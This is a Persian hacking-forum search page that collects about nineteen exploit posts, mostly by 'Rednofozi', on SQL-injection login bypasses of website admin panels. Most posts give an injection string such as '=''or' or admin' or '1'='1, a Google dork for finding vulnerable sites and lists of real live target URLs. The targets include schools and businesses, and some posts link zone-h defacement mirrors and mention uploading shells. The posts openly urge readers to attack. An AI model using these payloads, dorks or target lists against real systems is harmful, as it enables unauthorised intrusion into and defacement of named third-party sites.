امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'admin'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

40 نتیجه پیدا شد

  1. Rednofozi

    Pro-Exploit

    |--------------------------------------------------------------| |[+] Exploit Title:Novell Web Services Admin Page Bypass |[+] Date:16/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage :http://77.81.104.22/includes/communique_detail.php?id= |[+] Dork : n/a |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY site :anonysec.org |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] Exploit : |[+] all sites user and pass |[+] Username: '=''or' |[+] Password: '=''or' |[+] and user @pass |[+] '=' 'or' |[+] 'or ' 'x'='x |[+] "or "x"="x |[+] or 0=0 # |[+] or 1=1-- |[+] Admin Url :- |[+] |[+ http://77.81.104.22/includes/communique_detail.php?id= |[+] |--------------------------------------------------------------| [+]Put Username & Password Field with : ( '=''or' ) .... now , Start Your Attack ;) [+]The End , Enjoy Of Hacking ...! [+] test hacked by rednofozi [+] http://www.zone-h.org/mirror/id/31722197 [+] [+]================================================================== [+] [+] Demo : [+]http://77.81.104.22/includes/communique_detail.php?id= |--------------------------------------------------------------| # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. Rednofozi # >>> Discovered By :Rednofozi # >>> |==================================================================================== The END ; Good Luck
  2. |--------------------------------------------------------------| |[+] Exploit Title: Design by Third Eye Admin Panel Bypass Vulnerability |[+] Date:13/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:liveindia.ind.in |[+] dork:intext:"Design by Third Eye Digital Media. " |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Rednofozi |[+] Vulnerability Type :Admin Panel Bypass Vulnerability |[+] Severity Level : High ************************************************* [+] Search the dork in Google [+] Open target [+] Give exploit /admin in the raget [+] Enter username and password with [+] Username: '=''or' [+] Password: '=''or' [+] Vuln? You redirected to dashboard ***************************************************************| [+] Demo Site [+] http://liveindia.ind.in/admin/ [+] http://gujaratmart.in/admin/ [+] http://boditoday.com/admin/ [+] http://seasonsshop.in/admin [+] http://demonshop.in/admin/ |--------------------------------------------------------------| my name is Inj3ct0r Red Hat's hackers ********************************************************************** Discovered by :Rednofozi RGH team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2140
  3. ################################################################################################# # Exploit Title : Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/07/2018 # Vendor Homepages : copotronic.com ~ shikkhangon.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] # CXSecurity : cxsecurity.com/ascii/WLB-2018070067 ################################################################################################# # Another Exploit Title : Software IT Development By Copotronic InfoSystems Limited Shikkhangon CiMS Web Design Md. Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Description of the Software : Design & Develop By Copotyronic InfoSystem Ltd Copotronic InfoSystems Ltd. is a Private-Govt. joint venture software company. With a mission to build digital Bangladesh People’s Republic of Bangladesh has taken initiative to promote in IT companies to enable extensive automation services and supports to Govt. organizations of Bangladesh to be Digital.COPOTRONIC is a dynamic organization engaged in promoting software products, services,consultancy, Training using latest technologies to wide spectrum of corporations for over one decade. The quality & technology of the products reflect COPOTRONIC’s ability to produce & deliver world-class software solutions ################################################################################################# # Google Dorks : intext:''Copyright © 2018 Shikkhangon.com. All Right Reserved.'' intext:''© Copotronic InfoSystems Limited. All Right Reserved.'' inurl:''/about_college/'' site:edu.bd Copotronic # Admin Control Panel Path => /admin /login # Exploit : Username : '=''or' Password : '=''or' # Useable Administration Control Panel URL Links => /web/principal_message /web/notice /web/notice_list /web/form_add /web/form_list /web/information_list /web/slide /web/about /web/picture_gallery /web/catagory_list /admin/teacher_registration /admin/teacher_list /academic/class_teacher_assign /admin/teacher_salary_structure /admin/staff_registration /admin/staff_list /admin/student_registration /admin/student_list /admin/class_wise_student_list /admin/section_wise_student_list /admin/student_subject_assign /admin/student_subject_view /fees/fees_cat /fees/class_wise_fees_management /fees/student_fees_generate /web/slide# /academic/set_ca_marks /academic/create_tabulation_sheet /academic/marit_list /academic/marit_list_class /academic/mark_sheet /academic/transcript /academic/tabulation_sheet /academic/tabulation_sheet_subject_wise /academic/result_view /accounts/master_head_create /accounts/master_head_list /accounts/sub1_head_create /accounts/sub1_head_list /accounts/sub2_head_create /accounts/sub2_head_list /accounts/sub3_head_create /accounts/sub3_head_list /accounts/navigation_head_view /accounts/debit_voucher_entry /accounts/debit_voucher_list /accounts/credit_voucher_entry /accounts/credit_voucher_list /web/book_category_list /web/book_list /admin/student_sms_notice /admin/attendance /academic/show_class_routine /academic/show_exam_routine /admin/institute_information /admin/class_list /web/class_assign /academic/set_class_timing /academic/class_routine /admin/section_list /admin/section_assign /admin/session_list /admin/shift_list /admin/subject_list /admin/subject_assign /academic/gpa_system /academic/mark_distribution_system /academic/term_subject_list /academic/subject_wise_total_marks_list /academic/set_exam_time /academic/set_admit_card_initial /academic/term_list /admin/chartof_accounts /admin/weekly_holiday /admin/shift_assign Uploaded Image Path from Admin Panel => /template/upload/principal_image/1_principal_image[RANDOMNUMBER].png .jpg .jpeg .gif ################################################################################################# # Example Sites and Target Vulnerable IP Address 144.217.239.135 => 1) gachuaadarshahs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => zone-h.org/mirror/id/31443090 ~ archive.is/xfYrE 2) dbmrhs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => archive.is/JhaLN Vendor Homepage Admin Panel Path => copotronic.com/ims/shikkhangon/shikkhangon_admin/ 3) gnamhs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/hgFkL 4) uttararesidentialcollege.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/1DOxK 5) prbsc1930.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/qCvp3 6) sandwipidealhs.edu.bd => [ Proof of Concept for the Vulnerability ] =>archive.is/CHF7H 7) kadhurkhilhighschool.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/ipG78 7) kalapaniahs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/5Mv84 8) alhelalsat.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/ZyP4d 9) kapasgolaschool.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/pUGuF 10) mhabhs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/WxjIg 11) psidm.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/lw9D0 12) bgka.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/95DZt ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  4. --------------------------------------------------------------- # Exploit Title: Bongomedia Cms Admin Page Bypass Vulnerability # Google Dork: Powered by bongomedia # Exploit Author: MnHBlog # Vendor Homepage: www.bongomedia.com.au --------------------------------------------------------------- Site admin : www.target.com/admin/ Username & Password : '=''OR' --------------------------------------------------------------- Demo : https://www.sonsofrest.com.au/admin/ https://www.auswooddesign.com.au/admin/ ---------------------------------------------------------------
  5. |[+] Exploit Title: Copyright Civilized Adventures Inc admin by pass page Vulnerability |[+] Date:12/10/2018 [+] Category: Webapps |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Google Dork: intext: Copyright Civilized Adventures Inc.inurl /administrator/login.php |[+] Vendor Homepage :http://pradeephagarwal.com |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |--------------------------------------------------------------| |[+] anonysec Hacker ****************************************************************| |[+] Exploit Info : # {INFO} # Page Admin : /administrator/login.php Bypass User & Pass : '=' 'or' |--------------------------------------------------------------| |[+] |[+] Demo: admin by pass Vulnerability- : [+] search the google dork ==> intext : intext: Copyright Civilized Adventures Inc.inurl /administrator/login.php [+] select a target [+] by pass login # {DEMO} # 01: https://www.civilizedadv.com/admin-login # 02:https://www.cietrtv.com/admin-login # 03:https://www.csssdflizedadv.com/admin-login # 04:https://www.adv.com/admin-login # 05: https://www.adv.com/ admin-login by PASS FOR HACKEING TEST HACK http://www.zone-h.org/mirror/id/31749268 http://www.exploit4arab.org/exploits/2128
  6. |[+] Exploit Title: Brazil cms SQL Injection and admin Bypas Vulnerability |[+] Date:12/10/2018 [+] Category: Webapps |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Google Dork: inurl:detalhes_imovel.php?Cod= site:br' |[+] Vendor Homepage : www.hamilimoveis.com.br |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |--------------------------------------------------------------| |[+] anonysec Hacker ****************************************************************| |[+] Exploit Info : # {INFO} # Page Admin : site.br/adm Bypass User & Pass : '=' 'or' |--------------------------------------------------------------| |[+] |[+] Demo: admin by pass and injection Vulnerability- : [+] search the google dork ==> intext :inurl:detalhes_imovel.php?Cod= site:br' [+] select a target [+] inject sql codes # {DEMO} # 01: http://www.ubatubaceliolocacoes.com/detalhes_imovel.php?Cod=41 # 02: http://www.imoveismanduri.com.br/detalhes_imovel.php?Cod=71 # 03: http://www.hamilimoveis.com.br/detalhes_imovel.php?Cod=137 # 04: admin bypass and SQL Injection http://www.exploit4arab.org/exploits/2127
  7. Rednofozi

    Pro-Exploit

    |[+] Exploit Title:Indian Leader Site Admin Page Bypass |[+] Date: 10/10/2018 |[+] Exploit Author :Rednfozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage : http://www.gndei.org |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] anonysec Hacker ***************************************************************| |[+] Exploit :info # 1. Description: [+] Username: '=' 'or' [+] Password: '=' 'or' [+] Admin Panel :http://www.gndei.org/alogin.aspx/ |--------------------------------------------------------------| **************************************************************** Discovered by : Inj3ct0r and Rednofozi anonysec team hackers Thanks To: ReZa CLONER , Moeein Seven. Inj3ct0r http://www.exploit4arab.org/exploits/2111
  8. Rednofozi

    Pro-Exploit

    |[+] Exploit Title: Eldon Horse. admin pege bypass |[+] Exploit Author : Rednofozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage :http://www.eldonhors.com.pk |[+] Google Dork:"inurl:"/admin/data/" |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] anonysec Hacker *************************************************************** [+] Login Page http://www.localhost.com/admincp/ http://www.localhost.com/admin [+] Exploit: User:admin' or '1'='1 Pass:admin' or '1'='1 Enjoy Over 3 320 000 résultats |--------------------------------------------------------------| |[+] Demo: injection Vulnerability- |[+]http://darcolondon.co.uk/admincp/ |[+]http://www.eldonhors.com.pk/admincp/ |[+]http://humanbodyinst.com/admincp/ |[+]http://berkeleyrecycling.org/admin |[+]https://alborz.ut.ac.ir/admin |[+]http://www.sictombbi.ir/admin Enjoy Good luck http://www.exploit4arab.org/exploits/2117
  9. # Exploit Title: Powered By CF Image Hosting script admin page bypass vulnerability / upload shell # Exploit Author: Rednofozi # Date:2018-10-11 # Email: Rednofozi@yahoo.com # Vendor Homepage: www.codefuture.co.uk # OUR SITE : https://anonysec.org # MY page Exploit: https://www.exploit-db.com/author/?a=2243 |==================================================================================== # {INFO} # admin bypass Vulnerability |==================================================================================== # {DORK} # intext:"Powered By CF Image Hosting script |==================================================================================== # {POC} # admin page: # site.com/admin # exploit: # Username: '=''or' # password: '=''or' # # zone-h test hacked http://www.zone-h.org/mirror/id/31702111 |==================================================================================== # {DEMO} # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell # 05: # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi http://www.exploit4arab.org/exploits/2114
  10. Rednofozi

    Pro-Exploit

    [+] Exploit Title:irtci Site Admin Page Bypass |[+] Date: 10/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage : www.irtci.ir |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] anonysec Hacker ***************************************************************| |[+] Exploit :info # 1. Description: [+] Username: '=' 'or' [+] Password: '=' 'or' # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell |--------------------------------------------------------------| **************************************************************** Discovered by : Inj3ct0r and Rednofozi anonysec team hackers Thanks To: ReZa CLONER , Moeein Seven. Inj3ct0r http://www.exploit4arab.org/exploits/2112
  11. Rednofozi

    Pro-Exploit

    [+] Exploit Title:irtci Site Admin Page Bypass |[+] Date: 10/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage : www.irtci.ir |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] anonysec Hacker ***************************************************************| |[+] Exploit :info # 1. Description: [+] Username: '=' 'or' [+] Password: '=' 'or' # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell |--------------------------------------------------------------| **************************************************************** Discovered by : Inj3ct0r and Rednofozi anonysec team hackers Thanks To: ReZa CLONER , Moeein Seven. Inj3ct0r http://www.exploit4arab.org/exploits/2112
  12. Rednofozi

    Pro-Exploit

    [+] Exploit Title:Indian Leader Site Admin Page Bypass |[+] Date: 10/10/2018 |[+] Exploit Author :Rednfozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage : http://www.gndei.org |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] anonysec Hacker ***************************************************************| |[+] Exploit :info # 1. Description: [+] Username: '=' 'or' [+] Password: '=' 'or' [+] Admin Panel :http://www.gndei.org/alogin.aspx/ |--------------------------------------------------------------| **************************************************************** Discovered by : Inj3ct0r and Rednofozi anonysec team hackers Thanks To: ReZa CLONER , Moeein Seven. Inj3ct0r
  13. CustomPublish CMS - Login Admin panel Page Bypass - CXSecurity.com ################################################################ |--------------------------------------------------------------| |[+] Exploit Title: CustomPublish CMS - Login Admin panel Page Bypass |[+] Date: 08/10/2018 |[+] Exploit Author : Inj3ct0r |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage : http://shrisastha.com |[+]Google Dork:inurl:/admin/login.php and intitle:"CustomPublish CMS" |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| [+] Username: '=' 'or' [+] Password: '=' 'or' [+] Admin Panel : http://www.site.com/admin/ ============================== [+] http://www.vethathirimaharishischool.org/admin/ [+] http://shrisastha.com/admin/ [+] http://sriindiaexports.com/admin/ [+] http://www.shrividhyabharathi.com/admin/ [+] http://dhanamtimbers.com/admin/ [+] http://ebattery.in/admin/ # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By : Inj3ct0r # >>> tlg me:rednofozi |==================================================================================== The END ; Good Luck :D:D:D
  14. Rednofozi

    Pro-Influence

    https://0days.info/?exp=1327822 **************************************************************** ################################################################ |--------------------------------------------------------------| |[+] Exploit Title: Natural Software Admin Page Bypass |[+] Date: 08/10/2018 |[+] Exploit Author : Inj3ct0r |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage : http://www.uspsdistrict4.com |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ ***************************************************************| |[+] Exploit :info # 1. Description: [+] Username: '=' 'or' [+] Password: '=' 'or' [+] Admin Panel : http://www.uspsdistrict4.com//admin/ |--------------------------------------------------------------| **************************************************************** Discovered by : Rednofozi Thanks To: ReZa CLONER , Moeein Seven.Inj3ct0r.soldier anonymous. milad shadow
  15. Rednofozi

    Pro-Exploit

    Inet Hosting Solution Admin Page Bypass - CXSecurity.com ################################################################ |--------------------------------------------------------------| |[+] Exploit Title: Inet Hosting Solution Admin Page Bypass |[+] Date: 08/10/2018 |[+] Exploit Author : Inj3ct0r |[+] Vendor Homepage :http://inethostings.com |[+] Google Dork:N/A |[+] Tested on: Windows 10 and kali |[+] Software Link: N/A |[+] Version: N/A |[+] CVE : N/A |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] Exploit : |[+] all sites user and pass |[+] Username: '=''or' |[+] Password: '=''or' |[+] |[+] Admin Url :- |[+] |[+] http://inethostings.com/admin/ |[+] ----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------- # Discovered by : Inj3ct0r and rednofozi #--tnx to : ReZa CLONER , Moeein Seven. Rednofozi .soldier anonymous. milad shadow
  16. clphs.edu.my sites Admin panel Page Bypass - CXSecurity.com |--------------------------------------------------------------| |[+] Exploit Title: clphs.edu.my sites Admin panel Page Bypass |[+] Date: 08/10/2018 |[+] Exploit Author : Inj3ct0r |[+] Vendor Homepage : N/a |[+] Google Dork:N/A |[+] Tested on: Windows 10 |[+] Software Link: N/A |[+] Version: N/A |[+] CVE : N/A |[+] Team: https://www.exploit-db.com/author/?a=2243 |[+] ME:Inj3ctor@gmx.us |[+] MY pege https://cxsecurity.com/author/Inj3ct0r |[+] MY site :anonysec.org |[+] me:REdnfozi@yahoo.com |[+] MY site :anonysec.org |--------------------------------------------------------------| |[+] Exploit : |[+] all sites user and pass |[+] Username: '=''or' |[+] Password: '=''or' |[+] |[+] Admin Url :- |[+] |[+] https://www.target.co/admin/ |[+] |--------------------------------------------------------------| [+]Attention to end of URL , Like: ( /admin ) [+]Put Username & Password Field with : ( '=''or' ) .... now , Start Your Attack ;) [+]The End , Enjoy Of Hacking ...! [+] test hacked by rednofozi [+] http://www.zone-h.org/mirror/id/31722197 [+] [+]================================================================== [+] [+] Demo : [+] http://melsyindustries.com/admin_panel/login.php |[+]http://www.91fmbariri.com.br/admin/login.php |[+]http://www.asabenasports.com/admin |[+]http://rashnaenterprises.com/admin |[+]http://momanssstar.com/admin |[+]http://raonaqridersex.com/admin |[+]http://lightgalaporun.com/admin |[+]http://masterfaasashionco.com/admin |[+]http://www.sauspekoports.com/admin |[+]http://www.bilaaswqlsaffirintl.com/admin |[+]http://ihtashamimpex.com/admin |[+]http://www.siddiquesurgical.com/admincp/login.php |[+]http://kalassports.com/admincp/login.php |[+]http://www.hidracor.com.ar/catalogo/administrador/panel-principal.html |[+]http://www.vethathirimaharishischool.org/admin/ |[+]http://www.shrividhyabharathi.com/admin/ |[+]http://www.inovamedsaude.com.br/admin/login.php |[+]http://www.zeeschoolhosur.in/school/login.php?user=admin |[+]http://devineelevator.info/admin/ |[+]http://www.keshvienterprise.com/admin/ |[+]http://www.ycis.co.in/admin-login.php |[+]http://demo4clients.in/Altron/pages/login.php |[+]http://www.clphs.edu.my/logging.php?action=Login |[+]http://www.royalcustomhomes.com/admin/ |[+]http://dogmaindia.com/admin/home.php |[+]http://www.ksourc.org/admin/home.php |[+]http://www.amcrimhalves.com/admin/login.php |[+]http://www.che.iitkgp.ernet.in/controlpanel/ |[+]www.kharagpurtravels.com/controlpanel |[+]http://www.edline.in/ |[+]http://www.surali.com/admin/ |[+]http://atuljoshi.net/admin/ |[+]http://fitnessinpocket.com/admin/ |[+]http://aieeacademy.com/admin/ |[+]http://www.rohtashsweets.com/admin/index.php |[+]http://www.avonbakers.com/admin/ |[+]http://nmvcharger.com/wp-login.php |[+]http://www.brawn.co.in/admin/index1.php |[+]http://dupattaworld.in/admin/ |[+]http://www.mutejeans.com/admin/login.php |[+]http://kahvecilerfederasyonu.org/yonetim/login.php |[+]http://www.ankaraankarasitesi.com/yonetim/login.php |[+]http://www.sucuprogrami.com/yonetim/login.php |[+]http://www.richmcx.co.in/admin/welcome.php |[+]http://www.contechsrl.com/admin/login.php |[+]http://misbahunnur.com/admin/ |[+]http://sman2-muaraduakisam.sch.id/admin/ |[+]http://www.uspsdistrict4.com/Admin/index.php |[+]http://birminghampowersquadron.org/Admin/ |[+]http://www.columbussailandpower.org/Admin/ |[+]http://www.saginawbaypowersquadron.org/Admin/ |[+]http://madisonsquadron.org/Admin/ |[+]http://www.oshkoshsquadron.org/Admin/ |[+]http://galenadental.com/Admin/ |[+]http://www.uspsdistrict4.org/Admin/ |[+]http://lib.nmc.ac.th/th/admin/index.php |[+]http://law.nmc.ac.th/th/admin/index.php |[+]http://kiotchunganh.vn/admin/ |[+]http://aprobinaa.com/admin/ |[+]http://e-sabzevar.ir/fa/manager/login.php |[+]http://rde-sabzevar.ir/manager/login.php |[+]http://joycerealty.co.in/admin/login.php |[+]http://inethostings.com/admin |[+]http://www.ampresspack.com/admin/login.php |[+]http://www.oneder.cc/admin/login.php |[+]http://www.onederhardware.com/admin/login.php |[+]http://thcsducthuong.hoaiduc.edu.vn/admin.php |[+] |--------------------------------------------------------------| # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. Rednofozi .soldier anonymous. milad shadow # >>> Discovered By :Inj3ct0r # >>> |==================================================================================== The END ; Good Luck :D:D:D
  17. |[+] Exploit Title: JH Tech Admin panel Page Bypass |[+] |[+] Exploit Author : Rednofozi |[+] |[+] Google Dork:"Designed By : JH Tech Network" |[+] |[+] Vendor Homepage : http://jhtechnetwork.com/ |[+] |[+] Tested on: Windows 10 |[+] |[+] Date: 01-10-2018 |[+] my site :anonysec.org |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Username: '=''or' |[+] Password: '=''or' |[+] |[+] Admin Url :- |[+] |[+] http://Site.com/admincp/login.php |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+]http://alamanmedicalinstruments.com/admincp/login.php |[+]http://www.sixfinger.biz/admincp/login.php |[+]http://www.abenasports.com/admincp/login.php |[+]http://rashnaenterprises.com/admincp/login.php |[+]http://momanstar.com/admincp/login.php |[+]http://raonaqrider.com/admincp/login.php |[+]http://lightgalaxyintl.com/admincp/login.php |[+]http://masterfashionco.com/admincp/login.php |[+]http://www.sausports.com/admincp/login.php |[+]http://www.bilalsaffirintl.com/admincp/login.php |[+]http://ihtashamimpex.com/admincp/login.php |[+]http://www.siddiquesurgical.com/admincp/login.php |[+]http://kalassports.com/admincp/login.php |--------------------------------------------------------------| # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi # >>> tlg me:rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2057
  18. [+] Exploit Title: CustomPublish CMS - Login Admin panel Page Bypass |[+] |[+] Exploit Author : Rednofozi |[+] |[+] Google Dork:inurl:/admin/login.php and intitle:"CustomPublish CMS" |[+] |[+] Vendor Homepage : http://shrisastha.com |[+] |[+] Tested on: Windows 10 |[+] |[+] Date: 01-10-2018 |[+] my site :anonysec.org |--------------------------------------------------------------| [+] Username: '=' 'or' [+] Password: '=' 'or' [+] Admin Panel : http://www.site.com/admin/ ============================== [+] http://www.vethathirimaharishischool.org/admin/ [+] http://shrisastha.com/admin/ [+] http://sriindiaexports.com/admin/ [+] http://www.shrividhyabharathi.com/admin/ [+] http://dhanamtimbers.com/admin/ [+] http://ebattery.in/admin/ # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi # >>> tlg me:rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2058
  19. ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ==================================================================================== # Exploit Title:Add news ADMIN PANEL Bypass Vulnerability # Exploit Author: Rednofozi # Date:29-09-2018 # Email: Rednofozi@yahoo.com # Vendor Homepage: http://ripschool.in # OUR SITE : https://anonysec.org/ |==================================================================================== # {INFO} # Page Admin : site.com/admin Bypass User & Pass : '=' 'or' |==================================================================================== # {DORK} # " inurl /admin/add_news.php' |==================================================================================== |==================================================================================== # {DEMO} # 01: http://www.fm105.no/admin/index.php?grid_id=12&id=3&val=edt # 02: http://63.249.21.136/newsroom/admin/editNews.php?id=10 # 03: http://ripschool.in/admin/add_news.php # 04: admin bypass add_news # 05 # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2055
